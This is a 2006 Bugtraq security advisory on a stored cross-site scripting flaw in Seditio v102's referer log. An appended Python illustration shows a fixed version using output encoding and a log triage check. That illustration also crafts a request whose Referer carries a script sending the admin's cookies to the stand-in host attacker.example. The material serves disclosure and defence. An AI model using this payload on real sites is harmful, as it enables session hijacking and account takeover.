Message-ID: <20060524151826.31459.qmail@securityfocus.com>
Date: 24 May 2006 15:18:26 -0000
From: mail@...usemreyilmaz.com
To: bugtraq@...urityfocus.com
Subject: Seditio Cross Site Scripting Vulnerability
Advisory : Cross Site Scripting in Seditio (http://www.neocrome.net)
Release Date : 24/05/2005
Last Modified : 24/05/2005
Author : Yunus Emre Yilmaz ( http://yns.zaxaz.com)
Application : Seditio v102 (possibly older versions as well)
Risk : Critical
Problem :
Seditio (the successor of LDU) logs the Referer header of every request and shows that log to the administrator. The Referer value is supplied by the client and can be set to anything, so an attacker who puts JavaScript in it gets the code executed in the administration page when the administrator views the log (a stored cross-site scripting flaw).
Proof Of Concept :
I wrote a simple exploit, which can be downloaded here: http://yns.zaxaz.com/exploits/seditio-exploit.rar
Solution :
I wrote an unofficial security patch, which can be downloaded here: http://yns.zaxaz.com/security-patches/security-patches-seditio-v102-xss-patch.rar
(For official patches: www.neocrome.net)
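The flaw described under "Problem" and the kind of fix the "Solution" refers to, as an added illustration: this is not the author's exploit or patch and not Seditio's own code (Seditio is written in PHP; the sketch below is Python so it runs stand-alone). It shows the client-controlled Referer header being crafted, logged exactly as received, rendered into an admin page with and without output encoding, and a small triage check over an existing referer log. The header values, host names and function names are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker request headers (not a real capture).  The Referer
# header is chosen by the client, so nothing stops it from carrying markup.
ATTACKER_HEADERS = {
    "Host": "forum.example.test",
    "User-Agent": "Mozilla/5.0",
    "Referer": "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>",
}

LINKABLE_SCHEMES = ("http", "https")


def build_raw_request(path, headers):
    """Bytes of the HTTP/1.1 request the attacker sends so the payload gets logged."""
    lines = [f"GET {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def log_referer(store, headers):
    """Server side: record the Referer of a request exactly as received."""
    store.append(headers.get("Referer", ""))
    return store


def render_vulnerable(entries):
    """Admin page as the flawed code builds it: log entries dropped in unescaped."""
    return "<ul>" + "".join(f"<li>{r}</li>" for r in entries) + "</ul>"


def render_hardened(entries):
    """Admin page with output encoding.  Every entry is HTML-escaped with quotes
    included (it also lands inside an href attribute), and only http(s) URLs
    become clickable, so javascript: or data: referers never turn into links."""
    items = []
    for r in entries:
        safe = html.escape(r, quote=True)
        parts = urlsplit(r)
        if parts.scheme in LINKABLE_SCHEMES and parts.netloc:
            items.append(f'<li><a href="{safe}">{safe}</a></li>')
        else:
            items.append(f"<li>{safe}</li>")
    return "<ul>" + "".join(items) + "</ul>"


def suspicious_referers(entries):
    """Triage helper for a log that was written before the fix: flag entries
    that contain markup characters or are not plain http(s) URLs."""
    flagged = []
    for r in entries:
        if not r:
            continue  # an absent Referer is normal, not an attack
        try:
            scheme = urlsplit(r).scheme
        except ValueError:
            flagged.append(r)  # malformed enough that urlsplit rejects it
            continue
        if any(c in r for c in '<>"') or scheme not in LINKABLE_SCHEMES:
            flagged.append(r)
    return flagged


if __name__ == "__main__":
    store = log_referer([], ATTACKER_HEADERS)
    print(build_raw_request("/index.php", ATTACKER_HEADERS).decode())
    print(render_vulnerable(store))
    print(render_hardened(store))
    print(suspicious_referers(store + ["http://example.test/", "javascript:alert(1)"]))
```

In PHP the equivalent of `html.escape(r, quote=True)` at the point where the log is printed is `htmlspecialchars($referer, ENT_QUOTES)`. Escaping alone is only sufficient when the value is printed as text; if the admin page turns referers into clickable links, the scheme check above (or its PHP equivalent) is needed too, because `javascript:` survives HTML escaping untouched.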
Original Advisory :
http://yns.zaxaz.com/advisories/seditio.txt